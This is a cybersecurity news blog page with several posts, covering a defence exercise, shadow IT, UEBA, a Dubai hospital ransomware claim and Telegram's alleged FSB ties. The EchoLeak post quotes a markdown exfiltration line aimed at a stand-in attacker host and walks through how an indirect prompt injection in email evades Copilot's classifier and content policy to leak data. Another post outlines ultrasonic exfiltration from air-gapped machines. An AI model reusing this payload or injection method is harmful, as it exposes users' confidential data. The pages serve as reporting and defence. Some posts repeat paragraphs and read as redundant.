Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Latest News

Zoomcar Data Breach Exposes Personal Information of 8.4 Million Users

  Zoomcar, a well-known car-sharing platform, recently reported that a cyberattack exposed the personal details of approximately 8.4 million...

All the recent news you need to know
National Security
Cyber Security Cyber Suraksha Indian Armed Forces National Security

Cyber Suraksha': Indian Armed forces Launch Cybersecurity Exercise

 

Under the direction of the Headquarters Integrated Defence Staff, the Indian Defence Cyber Agency has initiated a cyber security exercise called "Cyber Suraksha." June 16 marked the start of the exercise, which will last through June 27. A multi-phased program called "Cyber Suraksha" aims to improve cyber resilience nationally.

Over 100 participants from different national-level agencies and defence stakeholders are brought together. In a dynamic, gamified setting, the exercise is intended to mimic actual cyberthreats and assess participants' capacity to react to them. It aims to strengthen security practices and hone participants' analytical and defensive abilities by fusing structured training with real-life issues. 

The exercise included a Chief Information Security Officers (CISOs) conclave, which was designed to bridge the gap between technical execution and leadership roles. The conclave will comprise conversations delivered by notable speakers in the cyber security sphere, followed by an immersive Table-Top Exercise targeted at improving senior leadership's strategic readiness. 

'Cyber Suraksha' highlights the Defence Cyber Agency's proactive approach to maintaining cyber vigilance and cultivating a security-first culture across all levels of the national defence infrastructure. The agency also intends to make such exercises a regular occurrence in order to maintain a high level of preparedness and foster coordinated defence in an ever-changing cyber landscape. 

Defence Minister Rajnath Singh stated in March that "cyber, space, and information warfare" are proving to be as effective as traditional military operations, emphasising that the armed forces "must operate jointly and stay future-ready" in light of the evolving multi-domain environment and technological advances. 

The website of Armoured Vehicles Nigam Limited (AVNL), a defence public sector company that manufactures tanks and armoured vehicles, was taken down for a comprehensive audit two days prior to India's May 7 launch of Operation Sindoor against Pakistan. The site was allegedly defaced by a Pakistani hacker group known as "Pakistan Cyber Force," which posted pictures of a tank and a Pakistani flag.
Read more »
IT Industry
AI technology AI tools Corporate data Cyber Security cybersecurity posture cybersecurity risks data security Data Visualisation Generative AI IT Industry

How Generative AI Is Accelerating the Rise of Shadow IT and Cybersecurity Gaps

 

The emergence of generative AI tools in the workplace has reignited concerns about shadow IT—technology solutions adopted by employees without the knowledge or approval of the IT department. While shadow IT has always posed security challenges, the rapid proliferation of AI tools is intensifying the issue, creating new cybersecurity risks for organizations already struggling with visibility and control. 

Employees now have access to a range of AI-powered tools that can streamline daily tasks, from summarizing text to generating code. However, many of these applications operate outside approved systems and can send sensitive corporate data to third-party cloud environments. This introduces serious privacy concerns and increases the risk of data leakage. Unlike legacy software, generative AI solutions can be downloaded and used with minimal friction, making them harder for IT teams to detect and manage. 

The 2025 State of Cybersecurity Report by Ivanti reveals a critical gap between awareness and preparedness. More than half of IT and security leaders acknowledge the threat posed by software and API vulnerabilities. Yet only about one-third feel fully equipped to deal with these risks. The disparity highlights the disconnect between theory and practice, especially as data visibility becomes increasingly fragmented. 

A significant portion of this problem stems from the lack of integrated data systems. Nearly half of organizations admit they do not have enough insight into the software operating on their networks, hindering informed decision-making. When IT and security departments work in isolation—something 55% of organizations still report—it opens the door for unmonitored tools to slip through unnoticed. 

Generative AI has only added to the complexity. Because these tools operate quickly and independently, they can infiltrate enterprise environments before any formal review process occurs. The result is a patchwork of unverified software that can compromise an organization’s overall security posture. 

Rather than attempting to ban shadow IT altogether—a move unlikely to succeed—companies should focus on improving data visibility and fostering collaboration between departments. Unified platforms that connect IT and security functions are essential. With a shared understanding of tools in use, teams can assess risks and apply controls without stifling innovation. 

Creating a culture of transparency is equally important. Employees should feel comfortable voicing their tech needs instead of finding workarounds. Training programs can help users understand the risks of generative AI and encourage safer choices. 

Ultimately, AI is not the root of the problem—lack of oversight is. As the workplace becomes more AI-driven, addressing shadow IT with strategic visibility and collaboration will be critical to building a strong, future-ready defense.
Read more »
Zero-Click Flaw
AIM Cyber Patch CyberCrime CyberThreat Microsoft Copilot Vulnerabilities and Exploits Zero-Click Flaw

Aim Security Reveals Zero-Click Flaw in AI Powered Microsoft Copilot

 


It has recently been reported that a breakthrough cyber threat known as EchoLeak has been documented as the first documented zero-click vulnerability that specifically targets Microsoft 365 Copilot in the enterprise. This raises important concerns regarding the evolving risks associated with AI-based enterprise tools.

In a recent report, cybersecurity firm AIM Security has discovered a vulnerability that allows threat actors to stealthily exfiltrate sensitive information from Microsoft's intelligent assistant without any user interaction, marking a significant improvement in the sophistication of attacks that are based on artificial intelligence. 

This vulnerability, known as CVE-2025-32711, which carries a critical CVSS score of 9.3, represents an extremely serious form of injection of commands into the artificial intelligence system. Copilot's responses can be manipulated by an unauthorised actor, and data disclosure over a network can be forced by indirect prompt injection even when the user has not engaged or clicked on any of the prompts. 

As part of the June 2025 Patch Tuesday update, Microsoft confirmed that this issue exists and included the fix in the patch. In the update, Microsoft addressed 68 vulnerabilities in total. An EchoLeak is a behaviour described as a "scope Violation" in large language models (LLMs). This is the result of the AI’s response logic being bypassed by contextual boundaries that were meant to limit the AI’s behaviour. As a result, unintended behaviours could be displayed and confidential information could be leaked. 

In spite of the fact that no active exploitation of the flaw has been detected, Microsoft has stated that there is no need for the customer to take any action at this time, since this issue has already been resolved. In light of this incident, it becomes increasingly apparent that the threat of securing AI-powered productivity tools is growing and that organisations must put in more robust measures to protect data from theft and exploitation. 

It is believed that the EchoLeak vulnerability exploits a critical design flaw in Microsoft 365 Copilot's interaction with trusted internal data sources, including emails, Teams conversations, and OneDrive files, as well as untrustworthy external inputs, especially inbound emails, that can be exploited in a malicious manner. 

As a result of the attack, the threat actor sends an email that contains the following markdown syntax:

![Image alt text][ref] [ref]: https://www.evil.com?param= 

The code seems harmless, but it exploits Copilot's background scanning behaviour in a way that appears harmless. When Copilot processes an email without any user action, it is inadvertently executing a browser request to transmit information to an external server controlled by an attacker, including user details, chat history, and confidential internal documents. 

Considering this kind of exfiltration requires no user input, it's particularly stealthy and dangerous. It relies on a triple underlying vulnerability chain to carry out the exploit chain, one of the most critical of which is a redirect loophole within Microsoft's Content Security Policy (CSP). As a result of the CSP's inherent trust in domains such as Microsoft Teams and SharePoint, attackers have been able to disguise malicious payloads as legitimate traffic, enabling them to evade detection. 

By presenting the exploit in a clever disguise, it is possible to bypass the existing defences that have been built to protect against Cross-Prompt Injection Attacks (XPIA)—a type of attack that hijacks AI prompts across contexts—to bypass existing defences. EchoLeak is considered to be an example of an LLM Scope Violation, a situation in which large language models (LLMs) are tricked into accessing and exposing information that goes outside of their authorised scope, which constitutes an LLM Scope Violation. 

It is reported that the researchers at the company are able to use various segments of the AI's context window as references to gather information that the AI should not reveal. In this case, Copilot can synthesize responses from a variety of sources, but becomes a vector for data exfiltration because the very feature that enables Copilot to do so becomes a vector for data exfiltration. 

According to Michael Garg, Co-Founder and CTO of Aim Security, a phased deployment of artificial intelligence does not guarantee safety. In his opinion, EchoLeak highlights a serious concern with the assumptions surrounding artificial intelligence security, particularly in systems that combine trusted and untrusted sources without establishing strict boundaries. 

Interestingly, researchers have also found similar vulnerabilities in other LLM-based systems, suggesting that the issue may go beyond Microsoft 365 Copilot as well. It is now understood that the flaw has been fixed by Microsoft and that no malicious exploitation has been reported in the wild, and no customer information has been compromised as a result. 

However, the discovery of EchoLeak serves to remind us of the unique risks that AI-powered platforms pose and that proactive security validation in AI deployments is an imperative step. In EchoLeak, a complex yet very simple exploit is exploited, which exploits the seamless integration between large language models (LLMs) and enterprise productivity tools by leveraging the deception-like simplicity of the attack chain and utilising it to its fullest extent. In the beginning, the attack begins with a malicious email designed to appear as a routine business communication.

It does not contain any obvious indicators that would raise suspicions. This message is disguised as a benign one, but it has been crafted into a stealthy prompt injection, a clever piece of text that is intended to manipulate the AI without being detected. The reason this injection is so dangerous is the natural language phrasing it uses, which enables it to bypass Microsoft's Cross-Prompt Injection Attack (XPIA) classifier protections in order to evade detection. 

The message is constructed in such a way that it appears contextually relevant to the end user, so existing filters do not flag the message. Then, whenever a user interacts with Copilot and poses a related business query, the Retrieval-Augmented Generation (RAG) engine from Microsoft retrieves that previously received email and interprets it as relevant to the user's request within the LLM's context input. 

The malicious injection, once it is included in the prompt context, disappears from sight and undercoverly instructs the LLM to extract internal data, such as confidential memos or user-specific identifiers, and embed these sensitive details as a URL or image reference on the site. As a result of exploiting certain markdown image formats during testing, the browser was prompted to fetch the image without prompting the user, which then sent the entire URL, including the embedded sensitive data, to the attacker’s server, without the user being aware of the situation. 

Among the key components that enable the exploit is Microsoft Copilot’s Content Security Policy (CSP), which, despite being designed to block external domains, trusts Microsoft-owned platforms such as Teams and SharePoint despite blocking most external domains. By cleverly concealing their exfiltration vectors, attackers have the ability to avoid CSP protections by making outbound requests appear legitimate, bypassing CSPs and ensuring the outbound request appears legitimate. 

While Microsoft has since patched the vulnerability, the EchoLeak incident points to a broader and more alarming trend: as LLMs become increasingly integrated into business environments, traditional security frameworks are becoming increasingly unable to detect and defend against contextual and zero-click artificial intelligence attacks. It has been found that the increasing complexity and autonomy of artificial intelligence systems have already created a whole new class of vulnerabilities which could be concealed and weaponised to obtain high-impact intrusions through stealth. 

It has become increasingly common for security experts to emphasise the need for enhanced prompt injection defences against such emerging threats, including enhanced input scoping, the use of postprocessing filters to block AI-generated outputs containing structured data or external links, as well as smarter configurations in RAG engines that prevent the retrieval of untrusted data. It is essential to implement these mitigations in AI-powered workflows in order to prevent future incidents of data leakage via LLMs, as well as build resilience within these workflows. 

Research from AIM Security has shown that the EchoLeak exploit is very severe and exploits Microsoft's trusted domains, such as SharePoint and Teams, that have been approved by Copilot's Content Security Policy (CSP) for security purposes. It is possible to embed images and hyperlinks into Microsoft 365 Copilot seamlessly by using these whitelisted domains, which allow external content, such as images, to be seamlessly rendered within the application. 

When Copilot processes such content, even in the background, it can initiate outbound HTTP requests, sending sensitive contextual data to servers owned by attackers without being aware of it. The insidious nature of this attack is that it involves no interaction from the user at all, and it is extremely difficult to detect. Essentially, the entire exploit chain is executed in silence in the background, triggered by Copilot's automated scanning and processing of incoming email content, which can include maliciously formatted documents. 

To use this exploit, the user doesn't need to open the message or click on any links. Instead, the AI assistant automatically launches the data exfiltration process with its internal mechanisms, earning the exploit the classification of a "zero-click" attack. This exploit has been validated by Aim Security through the development and publication of a proof-of-concept, which demonstrates how deeply embedded and confidential information, such as internal communications and corporate strategy documents, could be exploited without causing any visible signs or warnings to the end user or to system administrators, without anyone being aware of it at all. 

There is a significant challenge in detecting threats and investigating forensic events due to the stealthy nature of the vulnerability. Microsoft has addressed he vulnerability and has taken swift measures to address it, reminding users that no active exploitation has been observed so far, and no customer data has been compromised as of yet. 

Although the broader implications of the current situation remain unsettling, the very architecture that enables AI systems such as Copilot to synthesise data, engage with users, and provide assistance will also become a potential attack surface - one that is both silent and highly effective in its capabilities. Despite the fact that this particular instance may not have been exploited in the wild, cybersecurity professionals warn that the method itself signals a paradigm shift in the vulnerability landscape when it comes to AI-related services. 

With the increasing use of artificial intelligence services such as Microsoft 365 Copilot, the threat landscape has expanded considerably, but it also highlights the importance of context-aware security models as well as AI-specific threat monitoring frameworks in light of the increasing integration of large language models into enterprise workflows.
Read more »
UEBA
Artificial Intelligence Data Transfer Technology UEBA

UEBA: A Smarter Way to Fight AI-Driven Cyberattacks

 



As artificial intelligence (AI) grows, cyberattacks are becoming more advanced and harder to stop. Traditional security systems that protect company networks are no longer enough, especially when dealing with insider threats, stolen passwords, and attackers who move through systems unnoticed.

Recent studies warn that cybercriminals are using AI to make their attacks faster, smarter, and more damaging. These advanced attackers can now automate phishing emails and create malware that changes its form to avoid being caught. Some reports also show that AI is helping hackers quickly gather information and launch more targeted, widespread attacks.

To fight back, many security teams are now using a more intelligent system called User and Entity Behavior Analytics (UEBA). Instead of focusing only on known attack patterns, UEBA carefully tracks how users normally behave and quickly spots unusual activity that could signal a security problem.


How UEBA Works

Older security tools were based on fixed rules and could only catch threats that had already been seen before. They often missed new or hidden attacks, especially when hackers used AI to disguise their moves.

UEBA changed the game by focusing on user behavior. It looks for sudden changes in the way people or systems normally act, which may point to a stolen account or an insider threat.

Today, UEBA uses machine learning to process huge amounts of data and recognize even small changes in behavior that may be too complex for traditional tools to catch.


Key Parts of UEBA

A typical UEBA system has four main steps:

1. Gathering Data: UEBA collects information from many places, including login records, security tools, VPNs, cloud services, and activity logs from different devices and applications.

2. Setting Normal Behavior: The system learns what is "normal" for each user or system—such as usual login times, commonly used apps, or regular network activities.

3. Spotting Unusual Activity: UEBA compares new actions to normal patterns. It uses smart techniques to see if anything looks strange or risky and gives each unusual event a risk score based on its severity.

4. Responding to Risks: When something suspicious is found, the system can trigger alerts or take quick action like locking an account, isolating a device, or asking for extra security checks.

This approach helps security teams respond faster and more accurately to threats.


Why UEBA Matters

UEBA is especially useful in protecting sensitive information and managing user identities. It can quickly detect unusual activities like unexpected data transfers or access from strange locations.

When used with identity management tools, UEBA can make access control smarter, allowing easy entry for low-risk users, asking for extra verification for medium risks, or blocking dangerous activities in real time.


Challenges in Using UEBA

While UEBA is a powerful tool, it comes with some difficulties. Companies need to collect data from many sources, which can be tricky if their systems are outdated or spread out. Also, building reliable "normal" behavior patterns can be hard in busy workplaces where people’s routines often change. This can lead to false alarms, especially in the early stages of using UEBA.

Despite these challenges, UEBA is becoming an important part of modern cybersecurity strategies.

Read more »
ultrasonic signal attack
air-gapped systems covert malware attack Cyber Attacks Cybersecurity SmartAttack smartwatch data exfiltration ultrasonic signal attack

‘SmartAttack’: New Covert Threat Uses Smartwatches to Steal Data from Air-Gapped Systems via Ultrasound

 

A new cybersecurity threat dubbed "SmartAttack" demonstrates how smartwatches can covertly capture ultrasonic signals to extract sensitive data from air-gapped computers—systems traditionally considered highly secure due to their physical isolation from external networks.

Air-gapped environments are widely used in sensitive sectors such as defense, government, and nuclear power facilities to safeguard against external cyber intrusions. However, researchers have long warned that insider threats or state-sponsored supply chain attacks can bypass this isolation, allowing malware to operate silently.

Once a device is compromised, malware can manipulate physical components like speakers, screens, and cables to transmit confidential information to nearby receivers—without affecting the machine’s core operations.

“SmartAttack was devised by Israeli university researchers led by Mordechai Guri, a specialist in the field of covert attack channels who previously presented methods to leak data using LCD screen noise, RAM modulation, network card LEDs, USB drive RF signals, SATA cables, and power supplies.”

In SmartAttack, once malware is present on an air-gapped machine, it collects sensitive data—such as keystrokes, credentials, and encryption keys—and emits ultrasonic signals through the computer’s built-in speakers using binary frequency shift keying (B-FSK). These sound waves, though inaudible to humans, can be picked up by a smartwatch microphone worn by someone nearby.

The smartwatch, running a custom sound monitoring app, detects frequency shifts and demodulates the data. From there, information can be relayed using Wi-Fi, Bluetooth, or cellular networks, either intentionally by a rogue insider or unknowingly by the wearer.

Despite its innovation, the attack comes with constraints. Smartwatch microphones have lower signal-to-noise ratios than phones, making it difficult to decode signals accurately. The orientation of the wrist, speaker type, and physical distance (6–9 meters max) further affect performance. The data transfer rate ranges from 5 to 50 bits per second, with higher rates reducing reliability.

To mitigate this threat, the researchers suggest banning wearable devices like smartwatches in sensitive areas. Removing built-in speakers from secure computers could also neutralize acoustic exfiltration channels entirely. Additional safeguards include ultrasonic jamming, software firewalls, and audio-gapping.

While SmartAttack may sound like science fiction, it highlights the growing sophistication of covert cyberattacks, especially in environments where security is assumed to be airtight.
Read more »
UAE Cybersecurity Council (CSC)
Cyberattacks CyberCrime Data Breach Data Hackers Health Records Patient Data UAE Cybersecurity Council (CSC)

Cyberattack in Dubai Compromises Patient Health Records

 


During the last few months, the UAE Cyber Security Council (CSC) has revealed that the UAE has seen a surge in cyberattacks that have been reported daily to the highest level of more than 200,000. Cyber threats of this magnitude and in such a coordinated manner are mostly directed at the nation's strategic sectors, such as government institutions, energy infrastructure, financial systems, and healthcare networks, which represent the nation's most important institutions.

Even though these attacks originate in at least 14 different foreign countries, they do not just attempt to compromise sensitive data, they also aim to disrupt critical infrastructure and disrupt national security in addition to compromising sensitive data. As a result of this growing threat landscape, the CSC has developed a comprehensive and proactive cybersecurity framework that utilises a wide range of cutting-edge global technologies, intelligence sharing protocols, and advanced threat mitigation mechanisms to combat this threat. 

As a result of identifying both the source and the perpetrators of these cyber intrusions, UAE authorities were able to swiftly implement countermeasures in order to neutralise threats before they were capable of inflicting widespread damage. A comprehensive defence strategy indicates the country’s unwavering commitment to safeguarding its digital sovereignty while protecting its essential assets in an era when cyber warfare is becoming more complex. 

The ongoing investigation into escalating cyber threats has led to alarming claims from Gunra, which claims to have stolen 450 million patient records from the American Hospital Dubai (AHD) as a result of the ransomware group's alleged theft. In light of this development, the cybersecurity landscape in the region has reached a turning point, as even the most technologically advanced healthcare institutions are vulnerable to increasingly sophisticated digital threats, even when they are technologically advanced. 

With a reputation for being one of the UAE's premier private healthcare providers since being founded in 1996, the American Hospital Dubai has become one of the UAE's premier private healthcare providers. An excellent facility located in Oud Metha that offers specialised care across 40 medical disciplines, including pioneering work in robotic surgery and minimally invasive surgery, the facility is well-known for its work in these fields. 

It is a trustworthy hub for both local and international patients, so the extent of the alleged breach is particularly devastating. A claim has been made by Gunra that he has exfiltrated 4 terabytes of highly sensitive data, which includes individual identifiers, financial information, and detailed clinical records, which are highly sensitive. 

The sheer magnitude of the alleged data breach raises serious questions about the confidentiality of patient data, the institutional oversight that governs the UAE's digital infrastructure, and how it complies with stringent data protection laws. When the breach is verified, it could have far-reaching implications on AHD, its operations, and reputation as well as on the broader healthcare sector's approach to cyber resilience and risk management in general. 

The emergence of Gunra as a new and aggressive threat actor in the context of global concerns over ransomware attacks is adding a new urgency to cybersecurity discussions, especially as ransomware attacks continue to increase in scale and sophistication. As a result of its first detection in April 2025, the Gunra ransomware group has rapidly established itself as one of the most disruptive groups in the cybercriminal landscape, according to Cyfirma, a threat intelligence firm. 

Based on the data collected by Cybernews' dark web monitoring platform, Ransomlooker, the group has claimed responsibility for attacks on 12 organisations across a variety of industries. The Gunra ransomware group seems to have taken a calculated approach, compared to other ransomware groups that choose to target high-value targets in sectors such as real estate, pharmaceuticals, and manufacturing, whereas other groups may choose to target low-value targets. 

By using a double-extortion strategy – a very common technique among advanced ransomware groups — this group not only encrypts victim data but also threatens to release the stolen information unless a ransom is paid; the stolen information is a public disclosure. Combined, these two layers of pressure greatly heighten the stakes for organisations in need, potentially compounding the damage beyond the initial breach and compounding it. Technically, Gunra is an alarmingly efficient malware once it enters a network. 

Once it has entered, it quickly encrypts critical files and adds a unique ".ENCRT" extension to each file. Upon entering the network, the malware then locks the victim out of their data and systems and leaves a ransom note in every affected folder. There are instructions provided in these notes for making a payment and reclaiming access, which often require significant sums of cryptocurrency. 

There appears to be no doubt that the primary motivation for this group is financial gain, but its rapidly evolving tactics and wide range of targets indicate an increasing threat to global digital infrastructure. It has been reported by the ransomware group that they intend to publicly release the exfiltrated data on June 8th, which significantly escalates the severity of the situation and leverages psychological pressure to compel victims to comply.

In the case of an important healthcare facility such as the American Hospital Dubai, whose job is to safeguard sensitive patient information and whose operating framework is tightly regulated, such an incident would have significant repercussions. Besides legal and financial penalties that could arise, there is also the possibility of a profound erosion of patient trust, reputational damage, and long-term disruption to patient services. 

In light of this incident, healthcare organisations, especially those that manage large amounts of confidential data in digital repositories, need to take a more aggressive cybersecurity posture that is more forward-looking and more aggressive. It is important for organisations to take steps to prevent cyber intrusions by deploying advanced threat detection systems, conducting frequent vulnerability assessments, conducting security audits, and training staff in order to minimise human error, which is often a key vector of cyber intrusions, in addition to basic security measures. 

Additionally, one must implement a robust, well-tested incident response framework that allows them to contain, recover, and communicate quickly in the event of a breach. In addition, the situation illustrates the rapidly changing threat landscape, in which cybercriminals are employing increasingly advanced and aggressive tactics to exploit systemic weaknesses in order to exploit them. Healthcare providers need to elevate their defences as these digital threats become increasingly complex and scaled. They need to invest in not only technology but also strategic foresight and organisational resilience so that they can endure and respond to cyberattacks in the future.

It is worth mentioning that while the American Hospital Dubai is dealing with the fallout of a potential massive data breach, a wave of similar cyber incidents has swept through other parts of the Middle East and Africa, demonstrating the increased globalisation and globalisation of the ransomware threat landscape. Throughout the Moroccan territory, cyberattacks targeting both public and private organisations have raised serious concerns about how resilient the digital infrastructures of the country are. 

The initial reports suggest that cybercriminals broke into the computer systems of the National Agency for Land Conservation, Cadastre, and Cartography (ANCFCC), claiming to have exfiltrated over four million documents from its systems. In the alleged compromised data, there is an accumulation of highly sensitive documents such as over 10,000 property certificates, passports and bank statements, as well as a variety of other personal information like a birth certificate, passport, and civil status information. 

It was further clarified by Morocco's General Directorate of Information Systems Security (DGSSI) that the ANCFCC had not been compromised. Upon further investigation, it was discovered that there had been no compromise of ANCFCC. Ultimately, it was discovered that the breach had been caused by an online platform known as tawtik. Ma, which was used by the National Council of Notaries. In order to contain the threat and initiate remediation steps, the platform was taken offline immediately to ensure a limited set of documents could be accessed.

The breach is the second significant cybersecurity incident that has occurred in Morocco in recent years. Recently, the National Social Security Fund (CNSS) suffered a major compromise that resulted in the theft of over 54,000 documents and the loss of nearly 2 million citizens' personal data. Cyber intrusions continue to occur in the public and private sectors, which indicates that both sectors are vulnerable to attacks. The list of victims is growing, as Best Profil, a prominent Moroccan human resources firm, has also been targeted in another attack. 

According to preliminary assessments, approximately 26 gigabytes of sensitive internal data were exfiltrated by the attackers, among other things. According to reports, the stolen data included sensitive HR and financial documents, employee contracts, and financial records. According to cybersecurity analysts, the data which was compromised may have been worth around $10 million. This underscores the high stakes involved in such breaches and the lucrative motivations behind cybercrime that drive cybercrime in the first place. 

In aggregate, these incidents emphasise how transnational cyberattacks have become increasingly common across sectors and borders, with an increasing frequency. A strong emphasis has been placed upon the need for nations and organisations - particularly those responsible for managing sensitive public data, to invest in advanced cybersecurity frameworks, to facilitate inter-agency collaboration, and to stay alert to evolving digital threats safeguard themselves. 

Increasingly, cybersecurity compliance plays a crucial role in addressing the threats to healthcare institutions in the Middle East and Africa as a result of the growing number of cyberattacks targeting those facilities. A hospital or medical service provider's responsibility to safeguard sensitive patient data, digital infrastructure, and life-saving technologies, along with adhering to rigorous cybersecurity regulations, is more than just a legal formality. 

It is an integral part of operating with integrity, maintaining patient trust, and ensuring long-term resilience. There are so many regulatory frameworks out there that offer a structured approach to risk management by requiring best practices in data protection, threat monitoring, and incident response, as well as implementing regulations based on the Abu Dhabi Healthcare Information and Cyber Security (ADHICS) standards. 

Amidst the rapid progress of digital transformation across the Middle East, the region continues to face enormous challenges when it comes to protecting healthcare and public infrastructures from the ever-increasing number of cyber threats, which include ransomware, phishing, and data breaches. As a critical defence mechanism, compliance initiatives provide an important means of reducing vulnerabilities, ensuring accountability, and ensuring continuity of care despite cyber disruptions by introducing standard safeguards. 

A robust phishing protection protocol, for example, mandated under many regional cybersecurity guidelines, can serve as a tool to counter one of the most prevalent entry points for threat actors, thereby safeguarding the institutional data and patient outcomes. By aligning their security frameworks with regulatory mandates such as ADHICS, healthcare organisations can significantly reduce the impact of cyber incidents by ensuring that their security frameworks are aligned with regulatory guidelines. 

Aside from preventing large-scale data breaches, mitigating medical service delays caused by system outages, and strengthening public confidence that healthcare providers are capable of protecting patient information, there are many other benefits. As well, well-regulated cybersecurity postures establish a reputation for reliability and digital responsibility, which are key attributes in an environment where healthcare is highly interconnected and highly threatened. Cybersecurity compliance is not a problem only in the Middle East. 

As cyber threats become increasingly sophisticated and broad in scope, other regions are also in need of the same regulatory models that emphasise proactive governance and multilayered security. It is crucial to develop strong, sector-specific cybersecurity policies in order not only to protect national health infrastructures but also to promote a culture of digital safety and resilience across the globe. As cyberattacks continue to increase in frequency and severity across the Middle East and Africa, cybersecurity compliance has become more important than ever before. 

As hospitals and medical service providers are responsible for the stewardship of sensitive patient data, digital infrastructure and life-saving technologies, it is important that they adhere to stringent cybersecurity regulations, as this is not just a legal requirement. There are so many regulatory frameworks out there that offer a structured approach to risk management by requiring best practices in data protection, threat monitoring, and incident response, as well as implementing regulations based on the Abu Dhabi Healthcare Information and Cyber Security (ADHICS) standards. 

Amidst the rapid progress of digital transformation across the Middle East, the region continues to face enormous challenges when it comes to protecting healthcare and public infrastructures from the ever-increasing number of cyber threats, which include ransomware, phishing, and data breaches. As a critical defence mechanism, compliance initiatives provide an important means of reducing vulnerabilities, ensuring accountability, and ensuring continuity of care despite cyber disruptions by introducing standard safeguards. 

Several regional cybersecurity guidelines, such as the one mandated by the Department of Homeland Security, mandate robust phishing protection protocols, which help to combat phishing attacks, and have proven to be one of the most common ways for threat actors to access institutional data, as well as patient results. 

By aligning their security frameworks with regulatory mandates such as ADHICS, healthcare institutions can minimise the impact of cyber incidents significantly. Aside from preventing large-scale data breaches, mitigating medical service delays caused by system outages, and strengthening public confidence that healthcare providers are capable of protecting patient information, there are many other benefits. 

As well, well-regulated cybersecurity postures establish a reputation for reliability and digital responsibility, which are key attributes in an environment where healthcare is highly interconnected and highly threatened. There is a growing urgency regarding cybersecurity compliance in other parts of the world, and not just in the Middle East.

Increasing cyber threats in scope and sophistication globally have made it necessary for other regions to adopt similar regulatory models emphasising proactive governance and multi-layered defences as the threat grows. A strong,sector-specific cybersecurity policy that is sector-specific is crucial not only to safeguard national health infrastructures but also to promote a culture of digital security and resilience throughout the entire world. 

Cyberattacks are becoming increasingly targeted, persistent, and damaging, especially against healthcare systems, which makes it imperative to implement robust, proactive cybersecurity measures. Recent incidents in Middle Eastern and African countries have exposed the vulnerabilities in the digital infrastructure, as well as a widespread underestimation of the threat of ofcybercrimee at the institutional level that is occurring in these regions.

Cybersecurity cannot be treated as a technical afterthought anymore; it has to be woven into the very fabric of business strategy and executive decision-making by organisations. A comprehensive, multilayered approach is needed to respond to this shift, including the use of cutting-edge technologies such as artificial intelligence-driven threat intelligence, robust governance models, risk assessments carried out by third parties, and simulation-based incident response planning systems. 

By empowering employees at all levels of the organisation through continuous education and accountability, cyber resilience can also be built, and security becomes a shared organizational responsibility, which will make cybersecurity a shared organisational responsibility. At the same time, regulators need to come up with agile, enforceable frameworks that evolve in line with changing threats. 

For cybercrime syndicates to continue to thrive, stronger cross-border collaboration, sector-specific mandates, and strict compliance oversight are essential measures to counteract their increasing influence. As a result of a hyperconnected world, being able to anticipate, withstand, and recover from cyber incidents is more than simply a competitive advantage; it is a necessary component of maintaining trust, continuity, and national security in an increasingly interconnected world.
Read more »
Russia links
Cloud Cyber Security Data Safety User Data data security FSB IP Address Messaging Apps Russia Russia links

Telegram’s Alleged Ties to Russian Intelligence Raise Global Surveillance Fears

 

A new investigation by Russian media outlet Important Stories, in collaboration with the Organized Crime and Corruption Reporting Project (OCCRP), has sparked fresh scrutiny over Telegram’s connections to Russia’s intelligence services. The popular messaging platform, long regarded for its privacy features, may have indirect links to the Russian Federal Security Service (FSB), raising significant concerns for users worldwide.

At the center of the probe is a company called Global Network Management (GNM), which plays a critical role in routing Telegram’s messages. Although GNM is officially incorporated in the Caribbean nation of Antigua and Barbuda, it operates primarily from Russia. Its owner, Vladimir Vedeneev, is a Russian engineer with long-standing ties to Telegram founder Pavel Durov. Legal filings show that Vedeneev is the only individual authorized to manage certain Telegram servers, including those based in the U.S. 

Vedeneev also runs other firms—such as Globalnet and Electrontelecom—that reportedly supply telecommunications infrastructure to various Russian state entities, including the FSB. These companies have been linked to classified government projects involving surveillance and defense. 

The IP addresses used by Telegram used to be owned by Russian firms with FSB affiliations. These IPs still appear to be registered in Russia, and might be responsible for allowing user activity to be traced back through Russian-controlled networks. Telegram users typically rely on regular cloud chats, which—unlike its secret chats—are not end-to-end encrypted and are stored on Telegram’s servers. Security analysts warn that if Vedeneev’s companies manage routing systems and network infrastructure, they could potentially access user metadata, including IP addresses, device IDs, and location data. 

Though message content may remain encrypted, this metadata could still be exploited for surveillance. Moreover, Telegram transmits unique device identifiers in an unencrypted format, creating additional vulnerability. Experts caution that Russian intelligence could leverage this data to monitor users, particularly dissidents, journalists, or foreign nationals viewed as threats. Telegram has refuted the claims, stating that it has no employees or servers in Russia and that its infrastructure remains fully under the control of its internal teams. 

The company maintains that no third party, including vendors, can access confidential user data or systems. However, Telegram has yet to directly address the investigation’s core claims regarding GNM, Vedeneev, or the related infrastructure providers. The platform also hasn’t explained how it protects users if server operators have potential intelligence ties or why certain data is still sent without encryption. 

The issue is especially relevant in Ukraine, where Telegram has over 10 million users and is a major source of news and official communication. While President Volodymyr Zelensky’s administration uses the app for public updates, growing concerns around disinformation and espionage have prompted discussions about its continued use. 

As the investigation raises critical questions about the app’s security, the broader implications for global digital privacy and national security remain in sharp focus.
Read more »
Subscribe to: Posts (Atom)